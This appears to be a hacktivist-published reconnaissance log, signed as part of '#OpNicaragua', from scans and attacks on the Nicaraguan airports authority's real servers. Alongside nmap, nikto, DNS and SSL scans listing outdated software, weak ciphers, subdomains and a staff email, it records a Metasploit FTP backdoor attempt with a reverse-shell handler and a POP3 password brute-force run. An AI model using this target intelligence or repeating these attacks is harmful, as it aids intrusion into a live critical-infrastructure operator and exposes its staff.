- #######################################################################################################################################
- Hostname www.eaai.com.ni ISP Telmex Colombia S.A.
- Continent South America Flag
- CO
- Country Colombia Country Code CO
- Region Bogota D.C. Local time 20 Jul 2018 05:42 -05
- City Bogotá Postal Code 111311
- IP Address 190.85.233.91 Latitude 4.649
- Longitude -74.063
- #######################################################################################################################################
- HostIP:190.212.137.165
- HostName:eaai.com.ni
- Gathered Inet-whois information for 190.212.137.165
- ---------------------------------------------------------------------------------------------------------------------------------------
- Gathered Inic-whois information for eaai.com.ni
- ---------------------------------------------------------------------------------------------------------------------------------------
- Error: Unable to connect - Invalid Host
- ERROR: Connection to InicWhois Server ni.whois-servers.net failed
- close error
- Gathered Netcraft information for eaai.com.ni
- ---------------------------------------------------------------------------------------------------------------------------------------
- Retrieving Netcraft.com information for eaai.com.ni
- Netcraft.com Information gathered
- Gathered Subdomain information for eaai.com.ni
- ---------------------------------------------------------------------------------------------------------------------------------------
- Searching Google.com:80...
- HostName:www.eaai.com.ni
- HostIP:190.85.233.91
- Searching Altavista.com:80...
- Found 1 possible subdomain(s) for host eaai.com.ni, Searched 0 pages containing 0 results
- Gathered E-Mail information for eaai.com.ni
- ---------------------------------------------------------------------------------------------------------------------------------------
- Searching Google.com:80...
- Searching Altavista.com:80...
- Found 0 E-Mail(s) for host eaai.com.ni, Searched 0 pages containing 0 results
- Gathered TCP Port information for 190.212.137.165
- ---------------------------------------------------------------------------------------------------------------------------------------
- Port State
- 53/tcp open
- 80/tcp open
- 110/tcp open
- Portscan Finished: Scanned 150 ports, 7 ports were in state closed
- #######################################################################################################################################
- [i] Scanning Site: https://eaai.com.ni
- B A S I C I N F O
- =======================================================================================================================================
- [+] Site Title: Empresa Administradora de Aeropuertos Internacionales
- [+] IP address: 190.212.137.165
- [+] Web Server: Apache/2.0.52 (Red Hat)
- [+] CMS: Could Not Detect
- [+] Cloudflare: Not Detected
- [+] Robots File: Could NOT Find robots.txt!
- G E O I P L O O K U P
- =======================================================================================================================================
- [i] IP Address: 190.212.137.165
- [i] Country: NI
- [i] State: Managua
- [i] City: Managua
- [i] Latitude: 12.150800
- [i] Longitude: -86.268303
- H T T P H E A D E R S
- =======================================================================================================================================
- [i] HTTP/1.1 200 OK
- [i] Date: Fri, 20 Jul 2018 10:35:03 GMT
- [i] Server: Apache/2.0.52 (Red Hat)
- [i] X-Powered-By: PHP/4.3.9
- [i] Content-Length: 384
- [i] Connection: close
- [i] Content-Type: text/html; charset=UTF-8
- D N S L O O K U P
- =======================================================================================================================================
- ;; Truncated, retrying in TCP mode.
- eaai.com.ni. 43200 IN NS ns1.eaai.com.ni.
- eaai.com.ni. 43200 IN NS mail1.eaai.com.ni.
- eaai.com.ni. 43200 IN TXT "v=spf1 a:ns1.eaai.com.ni -all"
- eaai.com.ni. 43200 IN NS ns2.enitel.net.ni.
- eaai.com.ni. 43200 IN SOA ns1.eaai.com.ni. root.eaai.com.ni. 2018052301 10800 3600 2419200 3600
- eaai.com.ni. 43200 IN NS ns.enitel.net.ni.
- eaai.com.ni. 43200 IN A 190.212.137.165
- eaai.com.ni. 43200 IN MX 0 ns1.eaai.com.ni.
- eaai.com.ni. 43200 IN A 190.212.137.166
- S U B N E T C A L C U L A T I O N
- =======================================================================================================================================
- Address = 190.212.137.165
- Network = 190.212.137.165 / 32
- Netmask = 255.255.255.255
- Broadcast = not needed on Point-to-Point links
- Wildcard Mask = 0.0.0.0
- Hosts Bits = 0
- Max. Hosts = 1 (2^0 - 0)
- Host Range = { 190.212.137.165 - 190.212.137.165 }
- N M A P P O R T S C A N
- =======================================================================================================================================
- Starting Nmap 7.01 ( https://nmap.org ) at 2018-07-20 10:47 UTC
- Nmap scan report for eaai.com.ni (190.212.137.165)
- Host is up (0.082s latency).
- Other addresses for eaai.com.ni (not scanned): 190.212.137.166
- rDNS record for 190.212.137.165: ns1.eaai.com.ni
- PORT STATE SERVICE VERSION
- 21/tcp filtered ftp
- 22/tcp filtered ssh
- 23/tcp filtered telnet
- 80/tcp open http Apache httpd 2.0.52
- 110/tcp open pop3
- 143/tcp filtered imap
- 443/tcp open ssl/http Apache httpd 2.0.52 ((Red Hat))
- 3389/tcp filtered ms-wbt-server
- Service Info: Host: ns.eaai.com.ni
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 15.80 seconds
- S U B - D O M A I N F I N D E R
- =======================================================================================================================================
- [i] Total Subdomains Found : 3
- [+] Subdomain: ns1.eaai.com.ni
- [-] IP: 190.212.137.165
- [+] Subdomain: web.eaai.com.ni
- [-] IP: 190.85.233.91
- [+] Subdomain: pat.eaai.com.ni
- [-] IP: 190.212.137.164
- #######################################################################################################################################
- [?] Enter the target: https://www.eaai.com.ni/
- [!] IP Address : 190.85.233.91
- [!] Server: Apache/2.2.3 (CentOS)
- [+] Clickjacking protection is not in place.
- [+] Operating System : CentOS
- [!] www.eaai.com.ni doesn't seem to use a CMS
- [+] Honeypot Probabilty: 0%
- ---------------------------------------------------------------------------------------------------------------------------------------
- [~] Trying to gather whois information for www.eaai.com.ni
- [+] Whois information found
- [-] Unable to build response, visit https://who.is/whois/www.eaai.com.ni
- ---------------------------------------------------------------------------------------------------------------------------------------
- PORT STATE SERVICE VERSION
- 21/tcp filtered ftp
- 22/tcp filtered ssh
- 23/tcp filtered telnet
- 80/tcp open http Apache httpd 2.2.3
- 110/tcp filtered pop3
- 143/tcp filtered imap
- 443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
- 3389/tcp filtered ms-wbt-server
- ---------------------------------------------------------------------------------------------------------------------------------------
- [+] DNS Records
- [+] Host Records (A)
- www.eaai.com.niHTTP: (190.85.233.91) AS14080 Telmex S.A. Colombia
- [+] TXT Records
- [+] DNS Map: https://dnsdumpster.com/static/map/eaai.com.ni.png
- [>] Initiating 3 intel modules
- [>] Loading Alpha module (1/3)
- [>] Beta module deployed (2/3)
- [>] Gamma module initiated (3/3)
- [+] Emails found:
- ---------------------------------------------------------------------------------------------------------------------------------------
- pixel-1532083623873460-web-@www.eaai.com.ni
- [+] Hosts found in search engines:
- ---------------------------------------------------------------------------------------------------------------------------------------
- [-] Resolving hostnames IPs...
- [+] Virtual hosts:
- ---------------------------------------------------------------------------------------------------------------------------------------
- [~] Crawling the target for fuzzable URLs
- #######################################################################################################################################
- Starting Nmap 7.01 ( https://nmap.org ) at 2018-07-20 10:47 UTC
- Nmap scan report for eaai.com.ni (190.212.137.165)
- Host is up (0.082s latency).
- Other addresses for eaai.com.ni (not scanned): 190.212.137.166
- rDNS record for 190.212.137.165: ns1.eaai.com.ni
- PORT STATE SERVICE VERSION
- 21/tcp filtered ftp
- 22/tcp filtered ssh
- 23/tcp filtered telnet
- 80/tcp open http Apache httpd 2.0.52
- 110/tcp open pop3
- 143/tcp filtered imap
- 443/tcp open ssl/http Apache httpd 2.0.52 ((Red Hat))
- 3389/tcp filtered ms-wbt-server
- Service Info: Host: ns.eaai.com.ni
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 15.39 seconds
- #######################################################################################################################################
- Start: Fri Jul 20 10:48:00 2018
- HOST: whatweb Loss% Snt Last Avg Best Wrst StDev
- 1.|-- 45.55.64.253 0.0% 3 11.4 4.4 0.9 11.4 6.0
- 2.|-- 138.197.251.16 0.0% 3 0.4 5.4 0.4 14.9 8.2
- 3.|-- 138.197.244.32 0.0% 3 1.0 1.0 1.0 1.1 0.0
- 4.|-- ix-ae-3-0.tcore1.n75-new-york.as6453.net 0.0% 3 0.9 0.9 0.8 0.9 0.0
- 5.|-- if-ae-12-2.tcore2.nto-new-york.as6453.net 0.0% 3 1.1 1.2 1.1 1.3 0.0
- 6.|-- be3011.ccr31.jfk05.atlas.cogentco.com 0.0% 3 1.4 1.5 1.4 1.7 0.0
- 7.|-- be3294.ccr41.jfk02.atlas.cogentco.com 0.0% 3 1.4 1.5 1.4 1.6 0.0
- 8.|-- be2806.ccr41.dca01.atlas.cogentco.com 0.0% 3 8.2 8.3 8.2 8.5 0.0
- 9.|-- be2112.ccr41.atl01.atlas.cogentco.com 0.0% 3 18.6 18.7 18.6 18.8 0.0
- 10.|-- be3482.ccr21.mia01.atlas.cogentco.com 0.0% 3 32.4 32.4 32.3 32.4 0.0
- 11.|-- be3400.ccr21.mia03.atlas.cogentco.com 0.0% 3 33.3 33.4 33.3 33.7 0.0
- 12.|-- 38.142.153.74 0.0% 3 58.3 57.6 56.9 58.3 0.0
- 13.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- 14.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- 15.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- 16.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- 17.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- 18.|-- 162-137-212-190.enitel.net.ni 0.0% 3 80.4 80.5 80.4 80.7 0.0
- 19.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- #######################################################################################################################################
- Ip Address Status Type Domain Name Server
- ---------- ------ ---- ----------- ------
- 190.85.233.91 302 alias beta.eaai.com.ni Apache/2.2.3 (CentOS)
- 190.85.233.91 302 host web.eaai.com.ni Apache/2.2.3 (CentOS)
- 190.85.233.91 302 alias intranet.eaai.com.ni Apache/2.2.3 (CentOS)
- 190.85.233.91 302 host web.eaai.com.ni Apache/2.2.3 (CentOS)
- 190.212.137.166 301 host mail.eaai.com.ni Apache/2.0.52 (Red Hat)
- 190.212.137.166 301 host mail1.eaai.com.ni Apache/2.0.52 (Red Hat)
- 190.212.137.165 301 host ns.eaai.com.ni Apache/2.0.52 (Red Hat)
- 190.212.137.165 301 host ns1.eaai.com.ni Apache/2.0.52 (Red Hat)
- 190.85.233.91 302 host web.eaai.com.ni Apache/2.2.3 (CentOS)
- 190.85.233.91 302 alias www.eaai.com.ni Apache/2.2.3 (CentOS)
- 190.85.233.91 302 host web.eaai.com.ni Apache/2.2.3 (CentOS)
- #######################################################################################################################################
- [*] Performing General Enumeration of Domain: eaai.com.ni
- [-] DNSSEC is not configured for eaai.com.ni
- [*] SOA ns1.eaai.com.ni 190.212.137.165
- [*] NS ns2.enitel.net.ni 200.62.64.65
- [*] NS ns1.eaai.com.ni 190.212.137.165
- [*] NS ns.enitel.net.ni 200.62.64.1
- [*] NS mail1.eaai.com.ni 190.212.137.166
- [*] MX ns1.eaai.com.ni 190.212.137.165
- [*] A eaai.com.ni 190.212.137.165
- [*] A eaai.com.ni 190.212.137.166
- [*] TXT eaai.com.ni v=spf1 a:ns1.eaai.com.ni -all
- [*] Enumerating SRV Records
- [-] No SRV Records Found for eaai.com.ni
- [+] 0 Records Found
- #######################################################################################################################################
- [*] Processing domain eaai.com.ni
- [+] Getting nameservers
- 200.62.64.65 - ns2.enitel.net.ni
- 190.212.137.165 - ns1.eaai.com.ni
- 200.62.64.1 - ns.enitel.net.ni
- 190.212.137.166 - mail1.eaai.com.ni
- [-] Zone transfer failed
- [+] TXT records found
- "v=spf1 a:ns1.eaai.com.ni -all"
- [+] MX records found, added to target list
- 0 ns1.eaai.com.ni.
- [*] Scanning eaai.com.ni for A records
- 190.212.137.166 - eaai.com.ni
- 190.212.137.165 - eaai.com.ni
- 190.85.233.91 - beta.eaai.com.ni
- 190.85.233.91 - intranet.eaai.com.ni
- 190.212.137.166 - mail.eaai.com.ni
- 190.212.137.166 - mail1.eaai.com.ni
- 190.212.137.165 - ns.eaai.com.ni
- 190.212.137.165 - ns1.eaai.com.ni
- 190.85.233.91 - web.eaai.com.ni
- 190.85.233.91 - www.eaai.com.ni
- #######################################################################################################################################
- [+] Emails found:
- ------------------
- [+] Hosts found in search engines:
- ---------------------------------------------------------------------------------------------------------------------------------------
- Total hosts: 5
- [-] Resolving hostnames IPs...
- ...eaai.com.ni : empty
- .eaai.com.ni : empty
- mail.eaai.com.ni : 190.212.137.166
- mail1.eaai.com.ni : 190.212.137.166
- www.eaai.com.ni : 190.85.233.91
- #######################################################################################################################################
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 190.212.137.165
- Testing SSL server eaai.com.ni on port 443 using SNI name eaai.com.ni
- TLS Fallback SCSV:
- Server does not support TLS Fallback SCSV
- TLS renegotiation:
- Insecure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
- Accepted TLSv1.0 256 bits AES256-SHA
- Preferred SSLv3 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
- Accepted SSLv3 256 bits AES256-SHA
- Accepted SSLv3 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
- Accepted SSLv3 128 bits AES128-SHA
- Accepted SSLv3 128 bits RC4-SHA
- Accepted SSLv3 128 bits RC4-MD5
- Accepted SSLv3 112 bits EDH-RSA-DES-CBC3-SHA DHE 1024 bits
- Accepted SSLv3 112 bits DES-CBC3-SHA
- Accepted SSLv3 56 bits EDH-RSA-DES-CBC-SHA DHE 1024 bits
- Accepted SSLv3 56 bits DES-CBC-SHA
- Accepted SSLv3 40 bits EXP-EDH-RSA-DES-CBC-SHA DHE 512 bits
- Accepted SSLv3 40 bits EXP-DES-CBC-SHA RSA 512 bits
- Accepted SSLv3 40 bits EXP-RC2-CBC-MD5 RSA 512 bits
- Accepted SSLv3 40 bits EXP-RC4-MD5 RSA 512 bits
- Preferred SSLv2 128 bits RC2-CBC-MD5
- Accepted SSLv2 128 bits RC4-MD5
- Accepted SSLv2 112 bits DES-CBC3-MD5
- Accepted SSLv2 64 bits RC4-64-MD5
- Accepted SSLv2 56 bits DES-CBC-MD5
- Accepted SSLv2 40 bits EXP-RC2-CBC-MD5
- Accepted SSLv2 40 bits EXP-RC4-MD5
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: *.eaai.com.ni
- Altnames: DNS:*.eaai.com.ni, DNS:eaai.com.ni
- Issuer: Starfield Secure Certificate Authority - G2
- Not valid before: Aug 5 22:21:00 2017 GMT
- Not valid after: Aug 3 22:31:00 2018 GMT
- #######################################################################################################################################
- [+] searching (sub)domains for eaai.com.ni using built-in wordlist
- [+] using maximum random delay of 10 millisecond(s) between requests
- beta.eaai.com.ni
- IP address #1: 190.85.233.91
- intranet.eaai.com.ni
- IP address #1: 190.85.233.91
- mail.eaai.com.ni
- IP address #1: 190.212.137.166
- ns.eaai.com.ni
- IP address #1: 190.212.137.165
- ns1.eaai.com.ni
- IP address #1: 190.212.137.165
- pv.eaai.com.ni
- IP address #1: 165.98.58.22
- web.eaai.com.ni
- IP address #1: 190.85.233.91
- www.eaai.com.ni
- IP address #1: 190.85.233.91
- #######################################################################################################################################
- =======================================================================================================================================
- | [*] http://eaai.com.ni/ redirected to http://eaai.com.ni/
- | [*] New target is: http://eaai.com.ni/
- =======================================================================================================================================
- | Domain: http://eaai.com.ni/
- | Server: Apache/2.0.52 (Red Hat)
- | IP: 190.212.137.165
- =======================================================================================================================================
- |
- | Directory check:
- | [+] CODE: 200 URL: http://eaai.com.ni/icons/
- =======================================================================================================================================
- |
- | File check:
- | [+] CODE: 200 URL: http://eaai.com.ni/error/HTTP_NOT_FOUND.html.var
- | [+] CODE: 200 URL: http://eaai.com.ni/index.php
- | [+] CODE: 200 URL: http://eaai.com.ni/mailman/listinfo
- | [+] CODE: 200 URL: http://eaai.com.ni/webmail/src/configtest.php
- | [+] CODE: 200 URL: http://eaai.com.ni/webmail/src/read_body.php
- =======================================================================================================================================
- | E-mails:
- | [+] E-mail Found: mailman@eaai.com.ni
- | [+] E-mail Found: dmvega@eaai.com.ni
- |######################################################################################################################################
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Target IP: 190.85.233.91
- + Target Hostname: www.eaai.com.ni
- + Target Port: 443
- ---------------------------------------------------------------------------------------------------------------------------------------
- + SSL Info: Subject: /OU=Domain Control Validated/CN=*.eaai.com.ni
- Ciphers: DHE-RSA-AES256-SHA
- Issuer: /C=US/ST=Arizona/L=Scottsdale/O=Starfield Technologies, Inc./OU=http://certs.starfieldtech.com/repository//CN=Starfield Secure Certificate Authority - G2
- + Start Time: 2018-07-20 11:54:59 (GMT-4)
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Server: Apache/2.2.3 (CentOS)
- + Cookie fc7239472d86929b3f9e2af089868681 created without the secure flag
- + Cookie joomsef_lang created without the secure flag
- + Cookie joomsef_lang created without the httponly flag
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + Uncommon header 'x-logged-in' found, with contents: False
- + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Server leaks inodes via ETags, header found with file /robots.txt, inode: 6737953, size: 865, mtime: Mon Oct 27 11:48:10 2014
- + Entry '/administrator/' in robots.txt returned a non-forbidden or redirect HTTP code (401)
- + Entry '/cache/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/cli/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/components/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/images/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Cookie sj_lifemag_tpl created without the secure flag
- + Cookie sj_lifemag_tpl created without the httponly flag
- + Entry '/language/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/libraries/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/logs/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/media/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/plugins/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/templates/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + "robots.txt" contains 15 entries which should be manually viewed.
- + Server is using a wildcard certificate: *.eaai.com.ni
- + ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect: Connect failed: ; Connection timed out at /var/lib/nikto/plugins/LW2.pm line 5157.
- : Connection timed out
- + Scan terminated: 19 error(s) and 27 item(s) reported on remote host
- + End Time: 2018-07-20 12:33:23 (GMT-4) (2304 seconds)
- ---------------------------------------------------------------------------------------------------------------------------------------
- #######################################################################################################################################
- dnsenum VERSION:1.2.4
- ----- eaai.com.ni -----
- Host's addresses:
- __________________
- eaai.com.ni. 55136 IN A 190.212.137.166
- eaai.com.ni. 55136 IN A 190.212.137.165
- Name Servers:
- ______________
- mail1.eaai.com.ni. 55151 IN A 190.212.137.166
- ns1.eaai.com.ni. 55151 IN A 190.212.137.165
- ns.enitel.net.ni. 19689 IN A 200.64.62.1
- ns.enitel.net.ni. 19689 IN A 200.62.64.1
- ns2.enitel.net.ni. 19689 IN A 200.62.64.65
- Mail (MX) Servers:
- ___________________
- ns1.eaai.com.ni. 55149 IN A 190.212.137.165
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- Trying Zone Transfer for eaai.com.ni on mail1.eaai.com.ni ...
- Trying Zone Transfer for eaai.com.ni on ns1.eaai.com.ni ...
- Trying Zone Transfer for eaai.com.ni on ns.enitel.net.ni ...
- Trying Zone Transfer for eaai.com.ni on ns2.enitel.net.ni ...
- brute force file not specified, bay.
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-20 16:52 EDT
- Nmap scan report for eaai.com.ni (190.212.137.166)
- Host is up (0.88s latency).
- Other addresses for eaai.com.ni (not scanned): 190.212.137.165
- rDNS record for 190.212.137.166: mail1.eaai.com.ni
- Not shown: 451 closed ports, 20 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 53/tcp open domain
- 80/tcp open http
- 110/tcp open pop3
- 554/tcp open rtsp
- Nmap done: 1 IP address (1 host up) scanned in 8.51 seconds
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-20 16:53 EDT
- Nmap scan report for eaai.com.ni (190.212.137.166)
- Host is up (0.55s latency).
- Other addresses for eaai.com.ni (not scanned): 190.212.137.165
- rDNS record for 190.212.137.166: mail1.eaai.com.ni
- PORT STATE SERVICE
- 53/udp open domain
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 69/udp open|filtered tftp
- 88/udp open|filtered kerberos-sec
- 123/udp open|filtered ntp
- 137/udp open|filtered netbios-ns
- 138/udp open|filtered netbios-dgm
- 139/udp open|filtered netbios-ssn
- 161/udp open|filtered snmp
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 520/udp open|filtered route
- 2049/udp open|filtered nfs
- #######################################################################################################################################
- + -- --=[Port 21 opened... running tests...
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-20 16:53 EDT
- Nmap scan report for eaai.com.ni (190.212.137.166)
- Host is up (0.24s latency).
- Other addresses for eaai.com.ni (not scanned): 190.212.137.165
- rDNS record for 190.212.137.166: mail1.eaai.com.ni
- PORT STATE SERVICE VERSION
- 21/tcp open ftp?
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: WAP
- Running: D-Link embedded, TRENDnet embedded
- OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp
- OS details: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP
- Network Distance: 1 hop
- RHOST => eaai.com.ni
- RHOSTS => eaai.com.ni
- [-] eaai.com.ni:21 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (eaai.com.ni:21).
- [*] Exploit completed, but no session was created.
- [*] Started reverse TCP double handler on 10.211.1.29:4444
- [*] eaai.com.ni:21 - Sending Backdoor Command
- [*] Exploit completed, but no session was created.
- + -- --=[Port 22 closed... skipping.
- + -- --=[Port 23 closed... skipping.
- + -- --=[Port 25 closed... skipping.
- + -- --=[Port 53 opened... running tests...
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-20 17:07 EDT
- Nmap scan report for eaai.com.ni (190.212.137.165)
- Host is up.
- Other addresses for eaai.com.ni (not scanned): 190.212.137.166
- rDNS record for 190.212.137.165: ns1.eaai.com.ni
- PORT STATE SERVICE VERSION
- 53/tcp filtered domain
- Too many fingerprints match this host to give specific OS details
- Host script results:
- | dns-brute:
- | DNS Brute-force hostnames:
- | info.com.ni - 50.17.205.182
- | oracle.com.ni - 156.151.59.19
- | cdn.com.ni - 186.1.31.3
- |_ forum.com.ni - 54.86.188.65
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 ... 30
- #######################################################################################################################################
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://eaai.com.ni
- The site http://eaai.com.ni is behind a Imperva SecureSphere
- Number of requests: 9
- #######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning https://eaai.com.ni...
- ______________________ SITE INFO _______________________
- IP Title
- 190.212.137.165 Empresa Administradora de Ae
- 190.212.137.166
- _______________________ VERSION ________________________
- Name Versions Type
- Apache 2.0.52 Platform
- PHP 4.3.9 Platform
- Red Hat Enterprise Linux RHEL-4.8 OS
- ________________________________________________________
- Time: 1.8 sec Urls: 599 Fingerprints: 40401
- #######################################################################################################################################
- HTTP/1.1 301 Moved Permanently
- Date: Fri, 20 Jul 2018 20:58:48 GMT
- Server: Apache/2.0.52 (Red Hat)
- Location: https://eaai.com.ni/
- Connection: close
- Content-Type: text/html; charset=iso-8859-1
- #######################################################################################################################################
- [+] Screenshot saved to /usr/share/sniper/loot/eaai.com.ni/screenshots/eaai.com.ni-port80.jpg
- + -- --=[Port 110 opened... running tests...
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-20 17:11 EDT
- Nmap scan report for eaai.com.ni (190.212.137.165)
- Host is up (0.53s latency).
- Other addresses for eaai.com.ni (not scanned): 190.212.137.166
- rDNS record for 190.212.137.165: ns1.eaai.com.ni
- PORT STATE SERVICE VERSION
- 110/tcp open pop3
- | fingerprint-strings:
- | GenericLines:
- | +OK Server Ready
- | -ERR Invalid command
- | -ERR Invalid command
- | HTTPOptions:
- | -ERR Invalid command
- | -ERR Invalid command
- | Server Ready
- | NULL:
- |_ +OK Server Ready
- | pop3-brute:
- | Accounts: No valid accounts found
- | Statistics: Performed 351 guesses in 132 seconds, average tps: 2.7
- |_ ERROR: Failed to connect.
- 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: WAP
- Running: D-Link embedded, TRENDnet embedded
- OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp
- OS details: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP
- Network Distance: 1 hop
- TRACEROUTE (using port 443/tcp)
- HOP RTT ADDRESS
- 1 544.31 ms ns1.eaai.com.ni (190.212.137.165)
- #######################################################################################################################################
- I, [2018-07-20T17:13:44.645938 #14869] INFO -- : Initiating port scan
- Traceback (most recent call last):
- 3: from yasuo.rb:700:in `<main>'
- 2: from yasuo.rb:132:in `run'
- 1: from yasuo.rb:232:in `process_nmap_scan'
- yasuo.rb:232:in `each_slice': invalid slice size (ArgumentError)
- I, [2018-07-20T17:13:48.570743 #14869] INFO -- : Using nmap scan output file logs/nmap_output_2018-07-20_17-13-44.xml
- #######################################################################################################################################
- Anonymous #OpNicaragua JTSEC Full Recon #11